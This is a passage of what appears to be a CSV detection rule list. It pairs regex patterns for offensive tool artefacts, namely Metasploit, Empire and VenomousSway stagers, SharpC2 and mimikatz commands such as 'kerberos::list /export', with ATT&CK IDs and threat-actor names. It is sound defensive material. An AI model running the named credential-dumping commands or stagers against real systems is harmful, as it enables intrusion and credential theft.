- Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60237" "*stager_hidden_bind_tcp.asm*",".{0,1000}stager_hidden_bind_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60238" "*stager_reverse_https.bin*",".{0,1000}stager_reverse_https\.bin.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60239" "*stager_sock_find.asm*",".{0,1000}stager_sock_find\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60240" "*stagers/*/aes.py*",".{0,1000}stagers\/.{0,1000}\/aes\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60241" "*stagers/*/diffiehellman.py*",".{0,1000}stagers\/.{0,1000}\/diffiehellman\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60242" "*stagers/*/get_sysinfo.py*",".{0,1000}stagers\/.{0,1000}\/get_sysinfo\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60243" "*stagers/*/rc4.py*",".{0,1000}stagers\/.{0,1000}\/rc4\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60244" "*stagers/mytest_reverse_http.bin*",".{0,1000}stagers\/mytest_reverse_http\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60245" "*stagers/mytest_reverse_https.bin*",".{0,1000}stagers\/mytest_reverse_https\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60246" "*stagers/x64_mytest_reverse_http.bin*",".{0,1000}stagers\/x64_mytest_reverse_http\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60247" "*stagers/x64_mytest_reverse_https.bin*",".{0,1000}stagers\/x64_mytest_reverse_https\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60248" "*Stagers\ExeStager\*",".{0,1000}Stagers\\ExeStager\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","60249" "*Stagers\SvcStager\*",".{0,1000}Stagers\\SvcStager\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","60250" "*stagerx64.bin*",".{0,1000}stagerx64\.bin.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","60251" "*Staging_w_padding_3.5_x64-cleaned.bin*",".{0,1000}Staging_w_padding_3\.5_x64\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60252" "*Staging_w_padding_3.5_x86-cleaned.bin*",".{0,1000}Staging_w_padding_3\.5_x86\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60253" "*Staging_w_padding_4.X_x64-cleaned.bin*",".{0,1000}Staging_w_padding_4\.X_x64\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60254" "*Staging_w_padding_4.X_x86-cleaned.bin*",".{0,1000}Staging_w_padding_4\.X_x86\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60255" "*Staging_w_padding_v3_x64-cleaned.bin*",".{0,1000}Staging_w_padding_v3_x64\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60256" "*Staging_w_padding_v3_x86-cleaned.bin*",".{0,1000}Staging_w_padding_v3_x86\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60257" "*Staging_w_padding_v4_x64-cleaned.bin*",".{0,1000}Staging_w_padding_v4_x64\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60258" "*Staging_w_padding_v4_x86-cleaned.bin*",".{0,1000}Staging_w_padding_v4_x86\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60259" "*stamparm/fetch-some-proxies*",".{0,1000}stamparm\/fetch\-some\-proxies.{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","1","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","60260" "*standard::answer*",".{0,1000}standard\:\:answer.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60261" "*standard::base64*",".{0,1000}standard\:\:base64.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60262" "*standard::base64*kerberos::list /export*",".{0,1000}standard\:\:base64.{0,1000}kerberos\:\:list\s\/export.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","60263" "*standard::cd*",".{0,1000}standard\:\:cd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60264" "*standard::cls*",".{0,1000}standard\:\:cls.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60265" "*standard::coffee*",".{0,1000}standard\:\:coffee.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60266" "*standard::exit*",".{0,1000}standard\:\:exit.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60267" "*standard::hostname*",".{0,1000}standard\:\:hostname.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60268" "*standard::localtime*",".{0,1000}standard\:\:localtime.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
